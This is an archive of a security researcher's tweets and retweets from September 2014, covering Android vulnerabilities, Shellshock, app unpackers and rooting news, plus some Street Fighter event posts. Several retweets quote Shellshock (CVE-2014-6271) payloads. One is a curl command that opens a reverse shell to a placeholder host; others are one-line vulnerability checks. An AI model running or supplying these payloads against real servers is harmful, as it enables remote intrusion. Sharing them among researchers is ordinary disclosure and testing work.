Tweets from September 2014

RT @virqdroid: Automated Analysis of Adversarial Android Applications A5 - http://t.co/JG6TKbJPdx

10:24am September 29th 2014 via Falcon Pro

RT @AndroidTamer: article by @harupuxa related to CVE-2014-6041 (by @rafaybaloch ) / WebView Local File Access Restriction Bypass http://t.co/ghdfsZU4D4

10:23am September 29th 2014 via Falcon Pro

RT @viaforensics: How to forensically #root Android devices using viaExtract & viaExtractCE - https://t.co/6h8QovTLy1 #mobileforensics

3:01pm September 27th 2014 via Falcon Pro

RT @rhatdan: What does SELinux do to contain the the bash exploit? http://t.co/yqQP0a3G4F

2:54pm September 27th 2014 via Falcon Pro

@mgarciacase @jduck @googleglass @CyanogenMod most Android devices ship with mksh which is not vulnerable

10:22am September 26th 2014 via Falcon Pro in reply to mgarciacase

@cryptax only if they ship with bash, like CM11. But stock Android uses mksh which is not vulnerable. #shellshock

10:19am September 26th 2014 via Falcon Pro in reply to cryptax

RT @maldr0id: #Android InsecureBankv2 - app made for the #itsecurity researchers to analyze vulnerabilities: https://t.co/cH8pnv9xFh

10:17am September 26th 2014 via Falcon Pro

RT @jduck: some android devices, notably @googleglass and @cyanogenmod, ship vulnerable bash. however, no known vectors.

9:31am September 26th 2014 via Falcon Pro

RT @timstrazz: Hook read/write/mprotects for decrypt, dlopen(libdvm), open dex file, pass class loader < "new age" #Android packers in 1 tweet

8:01pm September 25th 2014 via Falcon Pro

RT @TeamAndIRC: .@dproldan and I just finished rooting his moto360, he should be releasing root soon

5:44pm September 25th 2014 via Falcon Pro

RT @dakami: “@tehowe: Busybox also vulnerable to CVE-2014-6271 in Android Terminal Emulator >:( (CM11 shown)http://t.co/b6NwtxOjZb” TOLDJA @ryancdotorg

10:11am September 25th 2014 via Falcon Pro

RT @5aelo: curl http://127.0.0.1:8000/cgi-bin/vulnerable -A "() { :;}; /bin/sh -i >& /dev/tcp/REVERSE_SHELL_IP/4444 0>&1"

10:08am September 25th 2014 via Falcon Pro

RT @julianor: Internal Server Error (500) or empty reply means vulnerable: curl -H"test:() { test; }; /usr/bin/yes" server CVE-2014-6271:

10:08am September 25th 2014 via Falcon Pro

RT @ortegaalfredo: http://t.co/z2AngOPQ06 <-- CGI CVE-2014-6271 exploit using /dev/tcp (another vuln!) and now it's actually a reverse shell, thnks @bleidl

8:49am September 25th 2014 via Falcon Pro

RT @angealbertini: $ env x='() { :;}; echo vulnerable' bash -c "echo test" vulnerable test https://t.co/uOQr65aynj

8:44am September 25th 2014 via Falcon Pro

RT @trufae: The statically compiled GDB for Android http://t.co/Nw52V4YjeD

6:26am September 25th 2014 via Falcon Pro

RT @jduck: POLL: If I exploit a vulnerability in Android's libc via an SMS, what category of Mobile Pwn2Own prize should be awarded? Lawyers welcome.

8:49am September 24th 2014 via Falcon Pro

RT @timstrazz: Excellent challenge! "Bangcle" aka "SecNeo" no longer dumps everything to memory, they only decrypt as needed - fun fun

6:28pm September 23rd 2014 via Falcon Pro

RT @Mobile_Sec: Android Futex Bug: Writing an uncontrolled value to a controlled address Part1: http://t.co/8XgW5kdZOO Part2: http://t.co/yTTElImOYx

9:33am September 23rd 2014 via Falcon Pro

RT @harupuxa: @rafaybaloch I posted article related CVE-2014-6041 :-) / WebView Local File Access Restriction Bypass http://t.co/mGoVU1RWjf

9:30am September 23rd 2014 via Falcon Pro

RT @rafaybaloch: Automatically test if your android browser is vulnerable to CVE-2014-6041 http://t.co/U0BSWgHH29 // cc @todb

9:27am September 23rd 2014 via Falcon Pro

chromeos-apk: Run Android APKs on Chrome OS, OS X, Linux and Windows through Crome browser - https://t.co/AFZPZbyf70

9:27am September 23rd 2014 via Falcon Pro

RT @virqdroid: Hello NQShield (Android app protector) http://t.co/XrOwibNtqr

9:22am September 23rd 2014 via Falcon Pro

RT @csoghoian: Google Android lock bypass for cops does not involve encryption keys, but changing the targets' gmail password. https://t.co/SAopsUKDVh

9:21am September 23rd 2014 via Falcon Pro

Thanks @48bits staff and all #lacon2k14 attendees who voted my talk! Arduino rules :D http://t.co/cPdDuJrEpm

9:45am September 21st 2014 via Falcon Pro

RT @tr1ana: Peaso regalo de @pof!! Gracias miarma!! http://t.co/vs5s0BMHM1

7:26pm September 20th 2014 via Falcon Pro

RT @todb: Weekly #Metasploit Wrapup - see the Android UXSS bug and BeEF video Tx @rafaybaloch @joevennix @wvuuuuuuuuuuuuu https://t.co/NQDFkncoFs

9:06pm September 19th 2014 via Falcon Pro

RT @quequero: Towelroot, escalating futex: http://t.co/9o9nLqg7Qx part 2/3

9:04pm September 19th 2014 via Falcon Pro

RT @kutyacica: http://t.co/MhvrERoHu4 has brand new content. There's also security stuff on Qualcomm's OnQ blog. https://t.co/2xdkJ3lqeV

9:26pm September 18th 2014 via Falcon Pro

RT @adesnos: Oh wait, Androguard is now on github https://t.co/TEaQuVZ2Au And now we have a GUI, thx to @saidelike for Androgui !

9:22pm September 18th 2014 via Falcon Pro

RT @marcograss: DexGuard 6.0 - http://t.co/DEs2PwL2s6 - SSL Pinning, Cordova apps encryption, dex splitting

9:10pm September 18th 2014 via Falcon Pro

RT @Tibapbedoum: @Mobile_Sec You can try Hooker: https://t.co/GwjNmV3VN1 Feedback is appreciated!

9:10pm September 18th 2014 via Falcon Pro

RT @hugo_glez: Master thesis on Attacking Android http://t.co/KJxJSO28Wa. 'A study of vulnerabilities on Android systems'

8:58pm September 18th 2014 via Falcon Pro

RT @Gunther_AR: While I was away, @timstrazz released another Android unpacker. This time for LIAPP - https://t.co/l7I8b5sUdB

8:29pm September 18th 2014 via Falcon Pro

RT @minWi: How Google Authenticator Works http://t.co/8ZS5qOm8rb

8:21pm September 18th 2014 via Falcon Pro

RT @0xroot: Having fun with AndroidManifest.xml http://t.co/puRwnp15HM & PoC framework for APK obfuscation https://t.co/8K6mW2ksJV

8:17pm September 18th 2014 via Falcon Pro

RT @jduck: Researching Android Device Security with the Help of a Droid Army - Blackhat USA slides - http://t.co/TH4dJZCXJa

8:14pm September 18th 2014 via Falcon Pro

RT @CERT_Polska_en: Fooling #Android #Malware researchers (or just restarting the emulator) with a clever use of AndroidManifest file: http://t.co/2oQ5ewZYZV

7:30pm September 18th 2014 via Falcon Pro

RT @therealundamned: Latest demonstration video of @mountainmanjed 's #SSF2X "Training Mode" ROM hack running on actual #CPS2 hardware: https://t.co/SonktSdPuk

7:16am September 16th 2014 via Falcon Pro

@minid esto te gustará: Why does HTML think “chucknorris” is a color? - http://t.co/wUR2IC54Z9

11:23pm September 14th 2014 via Falcon Pro

RT @raviborgaonkar: After Darshak #win, Google finally ready (but not fully) to create API to display cipher indicator for GSM/3G/LTE - https://t.co/WSpf2Mck4N

11:17pm September 14th 2014 via Falcon Pro

RT @TeamAndIRC: beaups and I are doing a (small?) AMAA on /r/htcone, lets talk about HTC and Android Security http://t.co/E1NkKVEtRW

7:26am September 14th 2014 via Falcon Pro

RT @fi01_IS01: このCVE-2014-3153 exploit libを使うサンプルとしてカーネルダンプのコマンドを公開します。更にuevent_helper のシã

4:15pm September 13th 2014 via Falcon Pro

RT @thuxnder: Finally, Android made some low level functions accessible. No need to call framework internal functions or use JNI: https://t.co/t858iYVuuZ

4:13pm September 13th 2014 via Falcon Pro

RT @timstrazz: Added a LKM for assisting with DexProtector unpacking, blog to follow shortly; https://t.co/5oWxRhZbBY

3:55pm September 13th 2014 via Falcon Pro

RT @esizkur: In which case a warning message is logged when A5/2 is used (though I doubt this warning ever reaches the UI). You could see that with QXDM.

3:52pm September 13th 2014 via Falcon Pro

RT @esizkur: At least for recent (i.e. LTE-enabled) QCOM chipsets, the default setting for A5/2 is off. But there's an NVRAM setting to turn it on again.

3:52pm September 13th 2014 via Falcon Pro

RT @viaProtect: Introducing viaLab Community Edition - the free mobile app security testing software from @viaforensics https://t.co/u5T1snLPlX

7:39am September 11th 2014 via Falcon Pro

RT @virqdroid: DEFCON 22 Using Metasploit to Exploit Android Demo - https://t.co/TL5pevoq7N

2:05am September 10th 2014 via Falcon Pro

RT @RonAmadeo: I couldn't help myself, sorry. http://t.co/NrwbqHMVL4

2:03am September 10th 2014 via Falcon Pro

RT @Gunther_AR: Just finished editing my buddy, @billa316 's new article, http://t.co/ZM92XVcJ28 uses @timstrazz script disclosed at Defcon :D

1:42am September 10th 2014 via Falcon Pro

My colleague @0xroot is doing a webinar tomorrow (in Spanish): Top 5 security mistakes in mobile app development - https://t.co/cXZIGIgYGd

8:54pm September 9th 2014 via Falcon Pro

RT @taviso: Linus talking my and @scarybeasts glibc exploitation https://t.co/lNIfSXMw8C

7:42am September 9th 2014 via Falcon Pro

RT @gtvhacker: @fail0verflow @Dev_Team_Eureka OTA Alert: Chromecast update 19084 patches the #HubCap exploit. Unplug your #Chromecast if you want to root.

11:07pm September 6th 2014 via Falcon Pro

RT @jduck: Check out Simon Lewis's 22 part (!!) blog series on the code relating to @BlueboxSec's FakeID vuln (cc @j4istal) pt1: http://t.co/VAk6zEMDYa

11:04pm September 6th 2014 via Falcon Pro

RT @AndroidTamer: Finding Android SSL Vulnerabilities with CERT Tapioca : https://t.co/QudfxHHFqL List of app that fail the test: https://t.co/CImmRbFMwr

10:55pm September 6th 2014 via Falcon Pro

SELinux on Android, LWN article - http://t.co/3gIC76kabj Protecting the Android TCB with SELinux slides [PDF] - http://t.co/wbl4J62NWM

10:15pm September 6th 2014 via Falcon Pro

@sf2kuroppi 2X Barcelona (Hit and Stun 2 Tournament) - today's pictures https://t.co/P3CoayaZwZ

8:41pm September 6th 2014 via Falcon Pro

RT @domi007: just added some info about how one could create tmsi_buster.py http://t.co/doAbZ6XsTp also a new theme on the blog, don't get confused

9:11am September 6th 2014 via Falcon Pro

in Barcelona this weekend? Come to play Head2Head #StreetFighter #SuperTurbo @ C/Àvila 112 http://t.co/onkk98OO6Y http://t.co/CUHIErn9zi

9:07am September 5th 2014 via Twitter Web Client

RT @regnerischerTag: OP-TEE ( Trusted Execution Environment ) , open-source security for the mass-market - Linaro - http://t.co/5cCXRaLuCg

6:33am September 5th 2014 via Falcon Pro

RT @BlueboxSec: If you missed @j4istal's at @BlackHatUSA, check out this video demonstration on the most recent Android vuln, #FakeID http://t.co/cTnsVdHSaI

8:29am September 4th 2014 via Falcon Pro

RT @nickdepetrillo: CryptoPhone guys use their custom, secure Android and baseband to detect rogue cell towers: http://t.co/1fVJwzYTXd yes, custom, baseband.

10:29pm September 3rd 2014 via Falcon Pro

RT @gtvhacker: @Dev_Team_Eureka @fail0verflow @gtvhacker The source to the Chromecast #HubCap root exploit is now available at https://t.co/QSuWU5whRD

9:09pm September 3rd 2014 via Falcon Pro

RT @rafaybaloch: Android Browser Same Origin Policy Bypass - http://t.co/FfFJltUwjs

7:39am September 2nd 2014 via Falcon Pro